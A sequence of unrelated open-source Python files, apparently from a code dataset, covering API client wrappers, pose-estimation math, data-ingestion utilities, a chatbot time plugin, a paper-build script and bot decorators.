_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Tag]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_list = _Endpoint(
settings={
'response_type': ([Tag],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_list
)
def __networking_project_netgw_tag_put(
self,
project_id,
location_id,
netgw_id,
tag_array,
**kwargs
):
"""Replace networking/netgw.tag # noqa: E501
Replace networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_put(project_id, location_id, netgw_id, tag_array, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_array (TagArray):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Tag]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_array'] = \
tag_array
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_put = _Endpoint(
settings={
'response_type': ([Tag],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_put',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_array',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_array',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_array':
(TagArray,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_array': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_tag_put
)
def __networking_project_netgw_update(
self,
project_id,
location_id,
netgw_id,
networking_project_netgw_update,
**kwargs
):
"""Update networking/netgw # noqa: E501
Returns modified netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_update(project_id, location_id, netgw_id, networking_project_netgw_update, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
networking_project_netgw_update (NetworkingProjectNetgwUpdate):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['networking_project_netgw_update'] = \
networking_project_netgw_update
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_update = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_update',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_update',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'networking_project_netgw_update':
(NetworkingProjectNetgwUpdate,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'networking_project_netgw_update': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_update
)
| 1.96875
| 2
|
src/pose_estimator/utils.py
|
Liang813/GaitGraph
| 57
|
12775588
|
<filename>src/pose_estimator/utils.py<gh_stars>10-100
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
import math
import numpy as np
import cv2
def transform_preds(coords, center, scale, output_size):
target_coords = np.zeros(coords.shape)
trans = get_affine_transform(center, scale, 0, output_size, inv=1)
for p in range(coords.shape[0]):
target_coords[p, 0:2] = affine_transform(coords[p, 0:2], trans)
return target_coords
def get_affine_transform(
center, scale, rot, output_size,
shift=np.array([0, 0], dtype=np.float32), inv=0
):
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
print(scale)
scale = np.array([scale, scale])
scale_tmp = scale * 200.0
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
rot_rad = np.pi * rot / 180
src_dir = get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5]) + dst_dir
src[2:, :] = get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def affine_transform(pt, t):
new_pt = np.array([pt[0], pt[1], 1.]).T
new_pt = np.dot(t, new_pt)
return new_pt[:2]
def get_3rd_point(a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
def get_dir(src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_max_preds(batch_heatmaps):
"""
get predictions from score maps
heatmaps: numpy.ndarray([batch_size, num_joints, height, width])
"""
assert isinstance(batch_heatmaps, np.ndarray), \
'batch_heatmaps should be numpy.ndarray'
assert batch_heatmaps.ndim == 4, 'batch_images should be 4-ndim'
batch_size = batch_heatmaps.shape[0]
num_joints = batch_heatmaps.shape[1]
width = batch_heatmaps.shape[3]
heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))
idx = np.argmax(heatmaps_reshaped, 2)
maxvals = np.amax(heatmaps_reshaped, 2)
maxvals = maxvals.reshape((batch_size, num_joints, 1))
idx = idx.reshape((batch_size, num_joints, 1))
preds = np.tile(idx, (1, 1, 2)).astype(np.float32)
preds[:, :, 0] = (preds[:, :, 0]) % width
preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)
pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))
pred_mask = pred_mask.astype(np.float32)
preds *= pred_mask
return preds, maxvals
def get_final_preds(config, batch_heatmaps, center, scale):
coords, maxvals = get_max_preds(batch_heatmaps)
heatmap_height = batch_heatmaps.shape[2]
heatmap_width = batch_heatmaps.shape[3]
# post-processing
if config.TEST.POST_PROCESS:
for n in range(coords.shape[0]):
for p in range(coords.shape[1]):
hm = batch_heatmaps[n][p]
px = int(math.floor(coords[n][p][0] + 0.5))
py = int(math.floor(coords[n][p][1] + 0.5))
if 1 < px < heatmap_width-1 and 1 < py < heatmap_height-1:
diff = np.array(
[
hm[py][px+1] - hm[py][px-1],
hm[py+1][px]-hm[py-1][px]
]
)
coords[n][p] += np.sign(diff) * .25
preds = coords.copy()
# Transform back
for i in range(coords.shape[0]):
preds[i] = transform_preds(
coords[i], center[i], scale[i], [heatmap_width, heatmap_height]
)
return preds, maxvals
| 2.28125
| 2
|
arts-main/handlers/registration.py
|
SilverLineFramework/orchestrator
| 0
|
12775589
|
<reponame>SilverLineFramework/orchestrator
"""Runtime registration."""
from pubsub import messages
from arts_core.serializers import RuntimeSerializer
from arts_core.models import Runtime
from .base import BaseHandler
class Registration(BaseHandler):
"""Runtime registration."""
def handle(self, msg):
"""Handle registration message."""
if msg.get('type') == 'arts_resp':
return None
print("[Registration] {}".format(msg.payload))
action = msg.get('action')
if action == 'create':
runtime = self._object_from_dict(Runtime, msg.get('data'))
runtime.save()
self.callback("create_runtime", runtime)
return messages.Response(
msg.topic, msg.get('object_id'),
RuntimeSerializer(runtime, many=False).data)
elif action == 'delete':
runtime = self._get_object(msg.get('data', 'uuid'), model=Runtime)
body = RuntimeSerializer(runtime, many=False).data
runtime.delete()
self.callback("delete_runtime", runtime)
return messages.Response(msg.topic, msg.get('object_id'), body)
else:
raise messages.InvalidArgument("action", msg.get('action'))
| 2.125
| 2
|
mkt/api/tests/test_base_urls.py
|
clouserw/zamboni
| 0
|
12775590
|
<gh_stars>0
"""Some URLs for test_base.py"""
from django.conf.urls import patterns, url
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.response import Response
from mkt.api.base import cors_api_view
@cors_api_view(['POST'], headers=('x-barfoo', 'x-foobar'))
@authentication_classes([])
@permission_classes([])
def _test_cors_api_view(request):
return Response()
urlpatterns = patterns(
'',
url(r'^test-cors-api-view/', _test_cors_api_view,
name='test-cors-api-view'),
)
| 1.8125
| 2
|
ConversortemperaturaFahrenheit .py
|
Reloure/curso_basico_python
| 0
|
12775591
|
<gh_stars>0
temperaturaFahrenheit = input("Digite uma temperatura em Fahrenheit: ")
temperaturaCelsius = (float(temperaturaFahrenheit) -32) * 5/9
print("A temperatura em celsius é",temperaturaCelsius)
| 3.703125
| 4
|
python_anvil/api_resources/mutations/generate_etch_signing_url.py
|
anvilco/python-anvil
| 4
|
12775592
|
<reponame>anvilco/python-anvil
from python_anvil.api_resources.mutations.base import BaseQuery
from python_anvil.api_resources.payload import GenerateEtchSigningURLPayload
class GenerateEtchSigningURL(BaseQuery):
"""Query class to handle retrieving a signing URL."""
mutation = """
mutation ($signerEid: String!, $clientUserId: String!) {
generateEtchSignURL (signerEid: $signerEid, clientUserId: $clientUserId)
}
"""
def __init__(self, signer_eid: str, client_user_id: str):
self.signer_eid = signer_eid
self.client_user_id = client_user_id
def create_payload(self):
return GenerateEtchSigningURLPayload(
signer_eid=self.signer_eid, client_user_id=self.client_user_id
)
| 2.46875
| 2
|
aepp/ingestion.py
|
benedikt-buchert/aepp
| 9
|
12775593
|
import aepp
from aepp import connector
from copy import deepcopy
import requests
from typing import IO, Union
import logging
class DataIngestion:
"""
Class that manages sending data via authenticated methods.
For Batch and Streaming messages.
"""
loggingEnabled = False
logger = None
def __init__(
self,
config: dict = aepp.config.config_object,
header=aepp.config.header,
loggingObject: dict = None,
**kwargs,
):
"""
Instantiate the DataAccess class.
Arguments:
config : OPTIONAL : config object in the config module.
header : OPTIONAL : header object in the config module.
Additional kwargs will update the header.
"""
if loggingObject is not None and sorted(
["level", "stream", "format", "filename", "file"]
) == sorted(list(loggingObject.keys())):
self.loggingEnabled = True
self.logger = logging.getLogger(f"{__name__}")
self.logger.setLevel(loggingObject["level"])
formatter = logging.Formatter(loggingObject["format"])
if loggingObject["file"]:
fileHandler = logging.FileHandler(loggingObject["filename"])
fileHandler.setFormatter(formatter)
self.logger.addHandler(fileHandler)
if loggingObject["stream"]:
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
self.logger.addHandler(streamHandler)
self.connector = connector.AdobeRequest(config_object=config, header=header)
self.header = self.connector.header
self.header.update(**kwargs)
self.sandbox = self.connector.config["sandbox"]
self.endpoint = (
aepp.config.endpoints["global"] + aepp.config.endpoints["ingestion"]
)
self.endpoint_streaming = aepp.config.endpoints["streaming"]["collection"]
self.STREAMING_REFERENCE = {
"header": {
"schemaRef": {
"id": "https://ns.adobe.com/{TENANT_ID}/schemas/{SCHEMA_ID}",
"contentType": "application/vnd.adobe.xed-full+json;version={SCHEMA_VERSION}",
},
"imsOrgId": "{IMS_ORG_ID}",
"datasetId": "{DATASET_ID}",
"createdAt": "1526283801869",
"source": {"name": "{SOURCE_NAME}"},
},
"body": {
"xdmMeta": {
"schemaRef": {
"id": "https://ns.adobe.com/{TENANT_ID}/schemas/{SCHEMA_ID}",
"contentType": "application/vnd.adobe.xed-full+json;version={SCHEMA_VERSION}",
}
},
"xdmEntity": {
"person": {
"name": {
"firstName": "Jane",
"middleName": "F",
"lastName": "Doe",
},
"birthDate": "1969-03-14",
"gender": "female",
},
"workEmail": {
"primary": True,
"address": "<EMAIL>",
"type": "work",
"status": "active",
},
},
},
}
def createBatch(
self,
datasetId: str = None,
format: str = "json",
multiline: bool = False,
enableDiagnostic: bool = False,
partialIngestionPercentage: int = 0,
) -> dict:
"""
Create a new batch in Catalog Service.
Arguments:
datasetId : REQUIRED : The Dataset ID for the batch to upload data to.
format : REQUIRED : the format of the data send.(default json)
multiline : OPTIONAL : If you wish to upload multi-line JSON.
"""
if datasetId is None:
raise ValueError("Require a dataSetId")
if self.loggingEnabled:
self.logger.debug(f"Using createBatch with following format ({format})")
obj = {
"datasetId": datasetId,
"inputFormat": {"format": format, "isMultiLineJson": False},
}
if multiline is True:
obj["inputFormat"]["isMultiLineJson"] = True
if enableDiagnostic != False:
obj["enableErrorDiagnostics"] = True
if partialIngestionPercentage > 0:
obj["partialIngestionPercentage"] = partialIngestionPercentage
path = "/batches"
res = self.connector.postData(self.endpoint + path, data=obj)
return res
def deleteBatch(self, batchId: str = None) -> str:
"""
Delete a batch by applying the revert action on it.
Argument:
batchId : REQUIRED : Batch ID to be deleted
"""
if batchId is None:
raise ValueError("Require a batchId argument")
if self.loggingEnabled:
self.logger.debug(f"Starting deleteBatch for ID: ({batchId})")
path = f"/batches/{batchId}"
params = {"action": "REVERT"}
res = self.connector.postData(self.endpoint + path, params=params)
return res
def replayBatch(self, datasetId: str = None, batchIds: list = None) -> dict:
"""
You can replay a batch that has already been ingested. You need to provide the datasetId and the list of batch to be replay.
Once specify through that action, you will need to re-upload batch information via uploadSmallFile method with JSON format and then specify the completion.
You will need to re-use the batchId provided for the re-upload.
Arguments:
dataSetId : REQUIRED : The dataset ID attached to the batch
batchIds : REQUIRED : The list of batchID to replay.
"""
if datasetId is None:
raise ValueError("Require a dataset ID")
if batchIds is None or type(batchIds) != list:
raise ValueError("Require a list of batch ID")
if self.loggingEnabled:
self.logger.debug(f"Starting replayBatch for dataset ID: ({datasetId})")
path = "/batches"
predecessors = [f"${batchId}" for batchId in batchIds]
data = {
"datasetId": datasetId,
"inputFormat": {"format": "json"},
"replay": {"predecessors": predecessors, "reason": "replace"},
}
res = self.connector.patchData(self.endpoint + path, data=data)
return res
def uploadSmallFile(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
data: Union[list, dict] = None,
verbose: bool = False,
) -> dict:
"""
Upload a small file (<256 MB) to the filePath location in the dataset.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that will store the value.
data : REQUIRED : The data to be uploaded (following the type provided). List or Dictionary, depending if multiline is enabled.
verbose: OPTIONAL : if you wish to see comments around the
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if data is None:
raise Exception("require data to be passed")
if verbose:
print(f"Your data is in {type(data)} format")
if self.loggingEnabled:
self.logger.debug(f"uploadSmallFile as format: ({type(data)})")
privateHeader = deepcopy(self.header)
privateHeader["Content-Type"] = "application/octet-stream"
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.putData(
self.endpoint + path, data=data, headers=privateHeader
)
return res
def uploadSmallFileFinish(
self, batchId: str = None, action: str = "COMPLETE", verbose: bool = False
) -> dict:
"""
Send an action to signify that the import is done.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
action : REQUIRED : either one of these actions:
COMPLETE (default value)
ABORT
FAIL
REVERT
"""
if batchId is None:
raise Exception("require a batchId")
if action is None or action not in ["COMPLETE", "ABORT", "FAIL", "REVERT"]:
raise Exception("Not a valid action has been passed")
path = f"/batches/{batchId}"
if self.loggingEnabled:
self.logger.debug(f"Finishing upload for batch ID: ({batchId})")
params = {"action": action}
res = self.connector.postData(
self.endpoint + path, params=params, verbose=verbose
)
return res
def uploadLargeFileStartEnd(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
action: str = "INITIALIZE",
) -> dict:
"""
Start / End the upload of a large file with a POST method defining the action (see parameter)
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that will store the value.
action : REQUIRED : Action to either INITIALIZE or COMPLETE the upload.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
params = {"action": action}
if self.loggingEnabled:
self.logger.debug(
f"Starting or Ending large upload for batch ID: ({batchId})"
)
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.postData(self.endpoint + path, params=params)
return res
def uploadLargeFilePart(
self,
batchId: str = None,
datasetId: str = None,
filePath: str = None,
data: bytes = None,
contentRange: str = None,
) -> dict:
"""
Continue the upload of a large file with a PATCH method.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that will store the value.
data : REQUIRED : The data to be uploaded (in bytes)
contentRange : REQUIRED : The range of bytes of the file being uploaded with this request.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if data is None:
raise Exception("require data to be passed")
if contentRange is None:
raise Exception("require the content range to be passed")
privateHeader = deepcopy(self.header)
privateHeader["Content-Type"] = "application/octet-stream"
privateHeader["Content-Range"] = contentRange
if self.loggingEnabled:
self.logger.debug(f"Uploading large part for batch ID: ({batchId})")
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = requests.patch(self.endpoint + path, data=data, headers=privateHeader)
res_json = res.json()
return res_json
def headFileStatus(
self, batchId: str = None, datasetId: str = None, filePath: str = None
) -> dict:
"""
Check the status of a large file upload.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
filePath : REQUIRED : the filePath that reference the file.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if self.loggingEnabled:
self.logger.debug(f"Head File Status batch ID: ({batchId})")
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.headData(self.endpoint + path)
return res
def getPreviewBatchDataset(
self,
batchId: str = None,
datasetId: str = None,
format: str = "json",
delimiter: str = ",",
quote: str = '"',
escape: str = "\\",
charset: str = "utf-8",
header: bool = True,
nrow: int = 5,
) -> dict:
"""
Generates a data preview for the files uploaded to the batch so far. The preview can be generated for all the batch datasets collectively or for the selected datasets.
Arguments:
batchId : REQUIRED : The batchId referencing the batch processed created beforehand.
datasetId : REQUIRED : The dataSetId related to where the data are ingested to.
format : REQUIRED : Format of the file ('json' default)
delimiter : OPTIONAL : The delimiter to use for parsing column values.
quote : OPTIONAL : The quote value to use while parsing data.
escape : OPTIONAL : The escape character to use while parsing data.
charset : OPTIONAL : The encoding to be used (default utf-8)
header : OPTIONAL : The flag to indicate if the header is supplied in the dataset files.
nrow : OPTIONAL : The number of rows to parse. (default 5) - cannot be 10 or greater
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if format is None:
raise Exception("require a format type")
params = {
"delimiter": delimiter,
"quote": quote,
"escape": escape,
"charset": charset,
"header": header,
"nrow": nrow,
}
if self.loggingEnabled:
self.logger.debug(f"getPreviewBatchDataset for dataset ID: ({datasetId})")
path = f"/batches/{batchId}/datasets/{datasetId}/preview"
res = self.connector.getData(self.endpoint + path, params=params)
return res
def streamMessage(
self,
inletId: str = None,
data: dict = None,
synchronousValidation: bool = False,
) -> dict:
"""
Send a dictionary to the connection for streaming ingestion.
Arguments:
inletId : REQUIRED : the connection ID to be used for ingestion
data : REQUIRED : The data that you want to ingest to Platform.
synchronousValidation : OPTIONAL : An optional query parameter, intended for development purposes.
If set to true, it can be used for immediate feedback to determine if the request was successfully sent.
"""
if inletId is None:
raise Exception("Require a connectionId to be present")
if data is None and type(data) != dict:
raise Exception("Require a dictionary to be send for ingestion")
if self.loggingEnabled:
self.logger.debug(f"Starting Streaming single message")
params = {"synchronousValidation": synchronousValidation}
path = f"/collection/{inletId}"
res = self.connector.postData(
self.endpoint_streaming + path, data=data, params=params
)
return res
def streamMessages(
self,
inletId: str = None,
data: list = None,
synchronousValidation: bool = False,
) -> dict:
"""
Send a dictionary to the connection for streaming ingestion.
Arguments:
inletId : REQUIRED : the connection ID to be used for ingestion
data : REQUIRED : The list of data that you want to ingest to Platform.
synchronousValidation : OPTIONAL : An optional query parameter, intended for development purposes.
If set to true, it can be used for immediate feedback to determine if the request was successfully sent.
"""
if inletId is None:
raise Exception("Require a connectionId to be present")
if data is None and type(data) != list:
raise Exception("Require a list of dictionary to be send for ingestion")
if self.loggingEnabled:
self.logger.debug(f"Starting Streaming multiple messages")
params = {"synchronousValidation": synchronousValidation}
data = {"messages": data}
path = f"/collection/batch/{inletId}"
res = self.connector.postData(
self.endpoint_streaming + path, data=data, params=params
)
return res
| 2.5
| 2
|
lessons/JenniferTimePlugin/plugin.py
|
19Leonidas99/JenniferVirtualAssistant
| 1
|
12775594
|
<reponame>19Leonidas99/JenniferVirtualAssistant<gh_stars>1-10
import inflect
import datetime
import semantic.dates
from lessons.base.plugin import JenniferResponsePlugin
from lessons.base.responses import JenniferResponse, JenniferTextResponseSegment
class JenniferTimePlugin(JenniferResponsePlugin):
PRIORITY = 999
VERBOSE_NAME = "Tell the time"
REQUIRES_NETWORK = False
@classmethod
def is_asking_for_time(cls, tags):
"""Tests if asking for time"""
need_these = [
('what', 'WP'), # what as a 'WH-pronoun'
('time', 'NN'), # time as a noun
]
return all([x in tags for x in need_these])
@classmethod
def is_asking_for_date(cls, tags):
"""Tests if asking for date"""
need_these = [
('what', 'WP'), # what as a 'WH-pronoun'
]
answer = all([x in tags for x in need_these])
any_of_these = [
('day', 'NN'),
('date', 'NN'),
]
answer = answer and any([x in tags for x in any_of_these])
return answer
def can_respond(self, **kwargs):
tags = kwargs.get('tags')
return JenniferTimePlugin.is_asking_for_time(tags) or JenniferTimePlugin.is_asking_for_date(tags)
def respond(self, **kwargs):
tags = kwargs.get('tags')
plain_text = kwargs.get('plain_text')
the_time = datetime.datetime.now()
if JenniferTimePlugin.is_asking_for_time(tags):
hour = the_time.strftime('%I').lstrip('0')
return JenniferResponse(self, [
JenniferTextResponseSegment(the_time.strftime('{}:%M %p'.format(hour)))
])
elif JenniferTimePlugin.is_asking_for_date(tags):
# Could be asking "what was the date _____", "what is the date", "what is the date _____", let's parse
possible_dates = semantic.dates.extractDates(plain_text)
def time_format(dt_obj):
inflect_eng = inflect.engine()
date_format = '%A, %B {}, %Y'.format(inflect_eng.ordinal(dt_obj.strftime('%d')))
return dt_obj.strftime(date_format)
# Asking for date today
if not possible_dates:
response = 'Today\'s date is {}'.format(time_format(the_time))
else:
# See if they specified a day?
the_time = possible_dates[0]
response = "{}".format(time_format(the_time))
return JenniferResponse(self, [
JenniferTextResponseSegment(response)
])
| 2.546875
| 3
|
scipy_proceedings/publisher/build_papers.py
|
ScienceStacks/JViz
| 31
|
12775595
|
#!/usr/bin/env python
import os
import sys
import shutil
import subprocess
import conf
import options
from build_paper import build_paper
output_dir = conf.output_dir
build_dir = conf.build_dir
bib_dir = conf.bib_dir
pdf_dir = conf.pdf_dir
toc_conf = conf.toc_conf
proc_conf = conf.proc_conf
dirs = conf.dirs
def paper_stats(paper_id, start):
stats = options.cfg2dict(os.path.join(output_dir, paper_id, 'paper_stats.json'))
# Write page number snippet to be included in the LaTeX output
if 'pages' in stats:
pages = stats['pages']
else:
pages = 1
stop = start + pages - 1
print('"%s" from p. %s to %s' % (paper_id, start, stop))
with open(os.path.join(output_dir, paper_id, 'page_numbers.tex'), 'w') as f:
f.write('\setcounter{page}{%s}' % start)
# Build table of contents
stats.update({'page': {'start': start,
'stop': stop}})
stats.update({'paper_id': paper_id})
return stats, stop
if __name__ == "__main__":
start = 0
toc_entries = []
options.mkdir_p(pdf_dir)
for paper_id in dirs:
build_paper(paper_id)
stats, start = paper_stats(paper_id, start + 1)
toc_entries.append(stats)
build_paper(paper_id)
src_pdf = os.path.join(output_dir, paper_id, 'paper.pdf')
dest_pdf = os.path.join(pdf_dir, paper_id+'.pdf')
shutil.copy(src_pdf, dest_pdf)
command_line = 'cd '+pdf_dir+' ; pdfannotextractor '+paper_id+'.pdf'
run = subprocess.Popen(command_line, shell=True, stdout=subprocess.PIPE)
out, err = run.communicate()
toc = {'toc': toc_entries}
options.dict2cfg(toc, toc_conf)
| 2.296875
| 2
|
botbot_plugins/decorators.py
|
metabrainz/brainzbot-plugins
| 4
|
12775596
|
def listens_to_mentions(regex):
"""
Decorator to add function and rule to routing table
Returns Line that triggered the function.
"""
def decorator(func):
func.route_rule = ('mentions', regex)
return func
return decorator
def listens_to_all(regex):
"""
Decorator to add function and rule to routing table
Returns Line that triggered the function.
"""
def decorator(func):
func.route_rule = ('messages', regex)
return func
return decorator
def listens_to_command(cmd):
"""
Decorator to listen for command with arguments return as list
Returns Line that triggered the function
as well as List of arguments not including the command.
Can be used as a compability layer for simpler porting of plugins from other
bots
"""
def decorator(func):
func.route_rule = ('commands', cmd)
return func
return decorator
def listens_to_regex_command(cmd, regex):
"""
Decorator to listen for command with arguments checked by regex
Returns Line that triggered the function.
The best of both worlds
"""
def decorator(func):
